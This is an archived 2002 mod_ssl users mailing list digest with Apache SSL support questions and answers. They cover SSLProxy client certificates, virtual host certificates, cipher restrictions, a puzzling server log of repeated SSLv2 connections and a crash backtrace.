Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtpde02.sap-ag.de id SAA07142; Tue, 15 Oct 2002 18:10:28 +0200 (MET DST)
Received: from sap-ag.de (smtpde02)
  by smtpde02.sap-ag.de (out) with ESMTP id SAA15125;
  Tue, 15 Oct 2002 18:10:25 +0200 (MESZ)
Message-Id: <200210151610.SAA27238@hw1464.wdf.sap-ag.de>
Date: Tue, 15 Oct 2002 18:16:07 +0200
From: Maik Mueller 
To: modssl-users@modssl.org
Cc: ccampetto@sogei.it, girl_intin_oss@yahoo.com, rse@engelschall.com,
        maik@sap.com
Subject: SSLProxy* directives
X-Mailer: Maik Mueller's registered AK-Mail 3.11 [ger]
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-SAP: out
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Maik Mueller 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

I have discovered some strange behavior using mod_proxy with SSL Client
Authentication.

We are talking about the following scenario:
Component:	Web Browser --- Proxy (mod_proxy)       --- Web Server
SSL Role:	SSL Client  --- SSL server | SSL Client --- SSL Server

Let's have a look at the second part of the connection:
Component:	mod_proxy  --- Web Server
SSL Role:	SSL Client --- SSL Server

In my scenario the Web server requires a SSL Client Certificate from
mod_proxy.

I figured out that providing both, client certificate and private key, in a
file referenced by SSLProxyMachineCertificateFile makes this scenario
working.


This brings up some questions to me:

Why aren't there two options like SSLProxyMachineCertificateFile,
SSLProxyMachineKeyFile for separated certificate and key files?

Is there a way to provide several certificate/key pairs?

The Apache documentation (www.apache.org) describes SSLProxy* as part of
mod_ssl. Why isn't there any information about SSLProxy* on www.modssl.org?
(Probably Ralf Engelschall can explain this.)

Is this Apache 2.0 feature available in Apache 1.3 too?

I think the current documentation of SSLProxyMachineCertificateFile is at
least misleading.

Regards,
	Maik
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 15 19:20:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA09909; Tue, 15 Oct 2002 19:19:07 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from arhosting.com id TAA09891; Tue, 15 Oct 2002 19:18:17 +0200 (MET DST)
Received: (qmail 5370 invoked by uid 104); 15 Oct 2002 16:57:29 -0000
Received: from barry@arhosting.com by speedy.arhosting.com with qmail-scanner-0.96 (uvscan: v4.1.50/v4147. . Clean. Processed in 0.589219 secs); 15 Oct 2002 16:57:28 -0000
Received: from unknown (HELO inferno.intranet.net) (165.29.94.254)
  by arhosting.com with SMTP; 15 Oct 2002 16:57:28 -0000
Subject: secure domains/subdomains
From: Barry Smoke 
To: lrlug-discuss@lrlug.org, modssl-users@modssl.org
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.8 (1.0.8-10) 
Date: 15 Oct 2002 12:17:38 -0500
Message-Id: <1034702258.1264.114.camel@inferno.intranet.net>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Barry Smoke 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I have a question about mod_ssl, and secure domains... 
I know that every unique address you register as secure requires a
certificate(yes it is extortion) 
so http://arhosting.com requires a certificate registered with that
address,  and secure.arhosting.com requires a seperate certificate
registered if I want to do sercure things on both domains seperate...

but what I don't know, is that if just like virtual hosts(which for
apache, that is what a subdomain is) do I have to have a seperate ip for
the main domain, and the subdomain, that is seperate...?

My apache vitual hosts entries look like this now:



DocumentRoot /home/arhosting.com/web
ServerName arhosting.com
ServerAlias www.arhosting.com

AllowOverride All




for per domain ip addresses, would I have to go to an ip in the
 field?
and can that ip be used for subdomains also that need secure certs?

I think I know the answer to this already....each virtual domain needing
it's own ip address for certs...(domains, and subdomains), but I just
want to verify.







______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 15 21:07:46 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA13924; Tue, 15 Oct 2002 21:06:35 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from radish.cambridge.redhat.com id VAA13904; Tue, 15 Oct 2002 21:05:47 +0200 (MET DST)
Received: from radish.cambridge.redhat.com (localhost.localdomain [127.0.0.1])
	by radish.cambridge.redhat.com (8.12.5/8.12.5) with ESMTP id g9FJ7cBq006021;
	Tue, 15 Oct 2002 20:07:38 +0100
Received: (from jorton@localhost)
	by radish.cambridge.redhat.com (8.12.5/8.12.5/Submit) id g9FJ7XFm006019;
	Tue, 15 Oct 2002 20:07:33 +0100
X-Authentication-Warning: radish.cambridge.redhat.com: jorton set sender to jorton@redhat.com using -f
Date: Tue, 15 Oct 2002 20:07:33 +0100
From: Joe Orton 
To: Maik Mueller 
Cc: modssl-users@modssl.org, ccampetto@sogei.it, girl_intin_oss@yahoo.com,
        rse@engelschall.com, maik@sap.com
Subject: Re: SSLProxy* directives
Message-ID: <20021015190733.GB5955@redhat.com>
Mail-Followup-To: Maik Mueller ,
	modssl-users@modssl.org, ccampetto@sogei.it,
	girl_intin_oss@yahoo.com, rse@engelschall.com, maik@sap.com
References: <200210151610.SAA27238@hw1464.wdf.sap-ag.de>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <200210151610.SAA27238@hw1464.wdf.sap-ag.de>
User-Agent: Mutt/1.4i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

On Tue, Oct 15, 2002 at 06:16:07PM +0200, Maik Mueller wrote:
> This brings up some questions to me:
> 
> Why aren't there two options like SSLProxyMachineCertificateFile,
> SSLProxyMachineKeyFile for separated certificate and key files?
> 
> Is there a way to provide several certificate/key pairs?

Yes, you can either put several key pairs in the file referenced by
SSLProxyMachineCertificateFile, or you can use a directory of files
(each containing a key pair) with SSLProxyMachineCertificatePath; all
files in the specified directory are loaded.

If you have configured the origin server to send a list of CA names in
the client certificate request, mod_ssl will then try to pick an
appropriate client cert which was issued by one of the CA names it
receives. (there are some useful debugging messages at "SSLLogLevel
debug")

> The Apache documentation (www.apache.org) describes SSLProxy* as part of
> mod_ssl. Why isn't there any information about SSLProxy* on www.modssl.org?
> (Probably Ralf Engelschall can explain this.)
> 
> Is this Apache 2.0 feature available in Apache 1.3 too?

Yep, these directives work in mod_ssl/2.8 for Apache 1.3, though were
never documented.

> I think the current documentation of SSLProxyMachineCertificateFile is at
> least misleading.

Yes, it's been cut'n'pasted badly; you could report a documentation bug
on that at http://nagoya.apache.org/bugzilla/

Regards,

joe

-- 
Joe Orton, Red Hat Europe, Stronghold Engineering
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 15 21:17:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA14276; Tue, 15 Oct 2002 21:16:31 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from enroque.rawbyte.com id VAA14267; Tue, 15 Oct 2002 21:15:53 +0200 (MET DST)
Received: by enroque.rawbyte.com (Postfix, from userid 501)
	id 9229725ED4; Tue, 15 Oct 2002 12:07:56 -0700 (PDT)
Date: Tue, 15 Oct 2002 12:07:56 -0700
From: Daniel Lopez 
To: modssl-users@modssl.org
Subject: Re: SSLProxy* directives
Message-ID: <20021015190756.GA7201@rawbyte.com>
References: <200210151610.SAA27238@hw1464.wdf.sap-ag.de>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <200210151610.SAA27238@hw1464.wdf.sap-ag.de>
User-Agent: Mutt/1.3.28i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Lopez 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


> The Apache documentation (www.apache.org) describes SSLProxy* as part of
> mod_ssl. Why isn't there any information about SSLProxy* on www.modssl.org?
> (Probably Ralf Engelschall can explain this.)

Because nobody wrote it :(  I was the one who wrote it for Apache 2, based
on some stuff we had for Covalent SSL

> Is this Apache 2.0 feature available in Apache 1.3 too?

I think so, you need to compile with SSL_EXPERIMENTAL flag. But I do not
think it worked very well Doug MacEachern rewrote a big part of it to work
more cleanly in Apache 2.0

> I think the current documentation of SSLProxyMachineCertificateFile is at
> least misleading.

Please correct and submit a patch to docs@httpd.apache.org :)

Cheers

Daniel

--
Teach Yourself Apache 2 -- http://apacheworld.org/ty24/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 15 21:48:23 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA15418; Tue, 15 Oct 2002 21:47:30 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from radish.cambridge.redhat.com id VAA15413; Tue, 15 Oct 2002 21:46:27 +0200 (MET DST)
Received: from radish.cambridge.redhat.com (localhost.localdomain [127.0.0.1])
	by radish.cambridge.redhat.com (8.12.5/8.12.5) with ESMTP id g9FJmNBq006206
	for ; Tue, 15 Oct 2002 20:48:23 +0100
Received: (from jorton@localhost)
	by radish.cambridge.redhat.com (8.12.5/8.12.5/Submit) id g9FJmNCK006204
	for modssl-users@modssl.org; Tue, 15 Oct 2002 20:48:23 +0100
X-Authentication-Warning: radish.cambridge.redhat.com: jorton set sender to jorton@redhat.com using -f
Date: Tue, 15 Oct 2002 20:48:22 +0100
From: Joe Orton 
To: modssl-users@modssl.org
Subject: Re: SSLProxy* directives
Message-ID: <20021015194822.GA6195@redhat.com>
Mail-Followup-To: modssl-users@modssl.org
References: <200210151610.SAA27238@hw1464.wdf.sap-ag.de> <20021015190756.GA7201@rawbyte.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20021015190756.GA7201@rawbyte.com>
User-Agent: Mutt/1.4i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, Oct 15, 2002 at 12:07:56PM -0700, Daniel Lopez wrote:
> 
> > The Apache documentation (www.apache.org) describes SSLProxy* as part of
> > mod_ssl. Why isn't there any information about SSLProxy* on www.modssl.org?
> > (Probably Ralf Engelschall can explain this.)
> 
> Because nobody wrote it :(  I was the one who wrote it for Apache 2, based
> on some stuff we had for Covalent SSL
> 
> > Is this Apache 2.0 feature available in Apache 1.3 too?
> 
> I think so, you need to compile with SSL_EXPERIMENTAL flag. But I do not
> think it worked very well Doug MacEachern rewrote a big part of it to work
> more cleanly in Apache 2.0

AFAICT the handling of client certs was not functionally changed at all
in 2.0, though yes, it has been massively cleaned up (using sensible
variable names rather than random collections of letters and all that
lovely stuff ;).

Regards,

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 15 22:24:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA16793; Tue, 15 Oct 2002 22:23:36 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from wendy.tfmx.com id WAA16761; Tue, 15 Oct 2002 22:22:29 +0200 (MET DST)
Received: from teleformix.com (Bilbo.gedye.net [12.251.136.22])
	by wendy.tfmx.com (8.9.3/8.9.3) with ESMTP id PAA04874
	for ; Tue, 15 Oct 2002 15:22:12 -0500
Message-ID: <3DAC786C.3857515@teleformix.com>
Date: Tue, 15 Oct 2002 15:19:56 -0500
From: Ron Gedye 
Organization: Teleformix LLC
X-Mailer: Mozilla 4.78 [en] (X11; U; Linux 2.4.8-26mdk i686)
X-Accept-Language: en
MIME-Version: 1.0
To: "modssl-users@modssl.org" 
Subject: Algorithm restrictions
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ron Gedye 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello all.

I have set my server to only accept certain methods of SSL, ie. no
export grade, no SSLv2, etc.

Does anyone know of a way to restrict by  Alogorithm rather than having
the client simply not be able to connect (DNS or Server failure).

In this case, I was wondering if I could do something similiar to an
'access denied' rather than simple client connect failure, that way I
could setup a page that tells the client why they couldn't connect,
similar to a 404 page.

As it is now, I get nothing in the logs regarding this connect failure.

Any help is appreciated...
Linux 
apache 1.3.26 static, mod_ssl 2.8.10 lib 0.9.7-beta2

Thanks in advance,

Ron
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 15 23:23:34 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA18911; Tue, 15 Oct 2002 23:21:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id XAA18736; Tue, 15 Oct 2002 23:19:11 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id BAB684CE770; Tue, 15 Oct 2002 23:19:10 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id BF77A28816; Tue, 15 Oct 2002 23:18:59 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp.caribou.homelinux.org id XAA18321; Tue, 15 Oct 2002 23:07:48 +0200 (MET DST)
Received: from beta.trusts.caribou.homelinux.org (unknown [192.168.0.2])
	by smtp.caribou.homelinux.org (Postfix) with ESMTP id 1DC63BCF0
	for ; Tue, 15 Oct 2002 23:07:47 +0200 (CEST)
Subject: Outdated box with strange logs
From: BeTa AlphA 
To: modssl-users@modssl.org
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.8 
Date: 15 Oct 2002 23:07:46 +0200
Message-Id: <1034716067.8326.28.camel@beta.trusts.caribou.homelinux.org>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: BeTa AlphA 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi... I'm new on this mailing-list... and to show my happiness... I have
a question about strange logs :

I'm running "Apache-AdvancedExtranetServer/1.3.23 mod_ssl/2.8.7
OpenSSL/0.9.6c PHP/4.1.2" on an old box on which I'll install a more
recent GNU/Linux into (Gentoo-Linux I think)...

I'd like to know what you can understand here (it is exhaustive and
repetitive... so you can let unread lot of things) :


------------------

[10/Oct/2002 01:45:53 01672] [info]  Connection to child 7 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:45:53 01672] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:45:53 01672] [info]  Connection: Client IP:
80.13.99.108, Protocol: SSLv2, Cipher: RC4-MD5 (128/128 bits)
[10/Oct/2002 01:45:53 01672] [info]  Connection to child 7 closed with
standard shutdown (server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:11 07927] [info]  Connection to child 0 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:11 07927] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:50:11 07939] [info]  Connection to child 5 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:11 07939] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:50:11 07926] [info]  Connection to child 1 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:11 07926] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:50:12 07943] [info]  Connection to child 6 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:12 07943] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:50:12 07930] [info]  Connection to child 2 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:12 07930] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:50:12 07928] [info]  Connection to child 3 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:12 07928] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:50:12 07929] [info]  Connection to child 4 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:12 07929] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:50:12 01672] [info]  Connection to child 7 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:12 01672] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:50:12 04601] [info]  Connection to child 8 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:12 04601] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:50:13 04602] [info]  Connection to child 9 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:13 04602] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:50:14 04603] [info]  Connection to child 10 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:14 04603] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:50:15 04604] [info]  Connection to child 11 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:15 04604] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:50:16 04605] [info]  Connection to child 12 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:16 04605] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:50:17 04606] [info]  Connection to child 13 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:17 04606] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:50:18 04607] [info]  Connection to child 14 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:18 04607] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:50:19 04608] [info]  Connection to child 15 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:19 04609] [info]  Connection to child 16 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:19 04609] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:50:19 04608] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:50:20 04610] [info]  Connection to child 17 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:20 04611] [info]  Connection to child 18 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:20 04611] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:50:20 04610] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:50:20 04612] [info]  Connection to child 19 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:20 04612] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:50:20 04613] [info]  Connection to child 20 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:20 04613] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:50:21 04614] [info]  Connection to child 21 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:21 04614] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:50:21 04615] [info]  Connection to child 22 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:21 04615] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:50:21 04616] [info]  Connection to child 23 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:21 04617] [info]  Connection to child 24 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:21 04617] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:50:21 04616] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:50:21 04618] [info]  Connection to child 25 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:21 04618] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:50:21 04620] [info]  Connection to child 27 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:21 04619] [info]  Connection to child 26 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:21 04619] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:50:21 04620] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:50:21 04621] [info]  Connection to child 28 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:21 04621] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:50:22 04622] [info]  Connection to child 29 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:22 04622] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:50:22 04623] [info]  Connection to child 30 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:22 04624] [info]  Connection to child 31 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:22 04623] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:50:22 04624] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:50:22 04626] [info]  Connection to child 33 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:22 04626] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:50:22 04625] [info]  Connection to child 32 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:22 04625] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 01:50:22 04623] [info]  Connection: Client IP:
80.13.99.108, Protocol: SSLv2, Cipher: RC4-MD5 (128/128 bits)
[10/Oct/2002 01:50:23 04624] [info]  Connection: Client IP:
80.13.99.108, Protocol: SSLv2, Cipher: RC4-MD5 (128/128 bits)
[10/Oct/2002 01:50:23 04626] [info]  Connection: Client IP:
80.13.99.108, Protocol: SSLv2, Cipher: RC4-MD5 (128/128 bits)
[10/Oct/2002 01:50:23 04625] [error] SSL handshake failed (server
www.old.chezmoi.org:443, client 80.13.99.108) (OpenSSL library error
follows)
[10/Oct/2002 01:50:23 04625] [error] OpenSSL: error:1406908F:SSL
routines:GET_CLIENT_FINISHED:connection id is different
[10/Oct/2002 01:50:24 07927] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
[10/Oct/2002 01:50:24 07939] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
[10/Oct/2002 01:50:24 07926] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
[10/Oct/2002 01:50:24 07943] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
[10/Oct/2002 01:50:24 07930] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
[10/Oct/2002 01:50:24 07928] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
[10/Oct/2002 01:50:24 07929] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
[10/Oct/2002 01:50:24 01672] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
[10/Oct/2002 01:50:24 04601] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
[10/Oct/2002 01:50:24 04602] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
[10/Oct/2002 01:50:24 04603] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
[10/Oct/2002 01:50:24 04604] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
[10/Oct/2002 01:50:24 04605] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
[10/Oct/2002 01:50:24 04606] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
[10/Oct/2002 01:50:24 04607] [info]  Spurious SSL handshake
interrupt[Hint: Usually just one of those OpenSSL confusions!?]
[10/Oct/2002 01:50:24 04623] [info]  Connection to child 30 closed
withwww.duval.dyndns.org standard shutdown (server
www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:24 04624] [info]  Connection to child 31 closed with
standard shutdown (server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 01:50:24 04626] [info]  Connection to child 33 closed with
standard shutdown (server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 02:07:24 07928] [info]  Connection to child 3 established
(server www.old.chezmoi.org:443, client 80.13.99.108)
[10/Oct/2002 02:07:24 07928] [info]  Seeding PRNG with 23177 bytes of
entropy
[10/Oct/2002 02:07:24 07928] [info]  Connection: Client IP:
80.13.99.108, Protocol: SSLv2, Cipher: RC4-MD5 (128/128 bits)
[10/Oct/2002 02:07:24 07928] [info]  Connection to child 3 closed with
standard shutdown (server www.old.chezmoi.org:443, client 80.13.99.108)

------------------

... I'll recieve all your ideas...
Thanks for your eventual attention.

BeTa
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 16 21:44:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA25168; Wed, 16 Oct 2002 21:42:34 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sccrmhc01.attbi.com id VAA25148; Wed, 16 Oct 2002 21:41:39 +0200 (MET DST)
Received: from taz.verniernetworks.com ([12.234.49.69])
          by sccrmhc01.attbi.com
          (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP
          id <20021016194132.BNOK28253.sccrmhc01.attbi.com@taz.verniernetworks.com>
          for ; Wed, 16 Oct 2002 19:41:32 +0000
Message-Id: <4.3.2.7.2.20021016123558.056df380@mail>
X-Sender: lance@127.0.0.1 (Unverified)
X-Mailer: QUALCOMM Windows Eudora Version 4.3.2
Date: Wed, 16 Oct 2002 12:41:31 -0700
To: modssl-users@modssl.org
From: Lance Uyehara 
Subject: apache core
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lance Uyehara 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I am running apache 1.3.22 and mod_ssl-2.8.5-1.3.22, and have had a few 
cores recently. They all have the same backtrace:

(gdb) whe
#0  0x28158f57 in ssl3_write_bytes () from /usr/lib/libssl.so.2
#1  0x28158e68 in ssl3_write_bytes () from /usr/lib/libssl.so.2
#2  0x28158b58 in ssl3_write_bytes () from /usr/lib/libssl.so.2
#3  0x2815a641 in ssl3_write () from /usr/lib/libssl.so.2
#4  0x28156698 in SSL_write () from /usr/lib/libssl.so.2
#5  0x80839bf in SSL_writev ()
#6  0x80838b0 in ssl_io_hook_writev ()
#7  0x80e1517 in ap_hook_call_func ()
#8  0x80e0c28 in ap_hook_call ()
#9  0x80bd16c in writev_it_all ()
#10 0x80bd5c3 in large_write ()
#11 0x80bd697 in ap_bwrite ()
#12 0x80d012f in ap_send_mmap ()
#13 0x80c6212 in default_handler ()
#14 0x80be9c8 in ap_invoke_handler ()
#15 0x80d37ac in process_request_internal ()
#16 0x80d3816 in ap_process_request ()
#17 0x80ca6af in child_main ()
#18 0x80ca958 in make_child ()
#19 0x80cacdc in perform_idle_server_maintenance ()
#20 0x80cb259 in standalone_main ()
#21 0x80cb8a4 in main ()
#22 0x805a549 in _start ()

I don't have symbols so it's a little hard for me to see what's happening, 
but I thought I'd see if this is a known issue.

I've tried to recompile my httpd with symbols but when I do that and run 
"gdb httpd " the backtrace seems to change. I don't think that's 
normal, so I suspect I'm doing something wrong.

Any help in tracking this down is appreciated.

Thanks,
-Lance

______________________________________________________________________
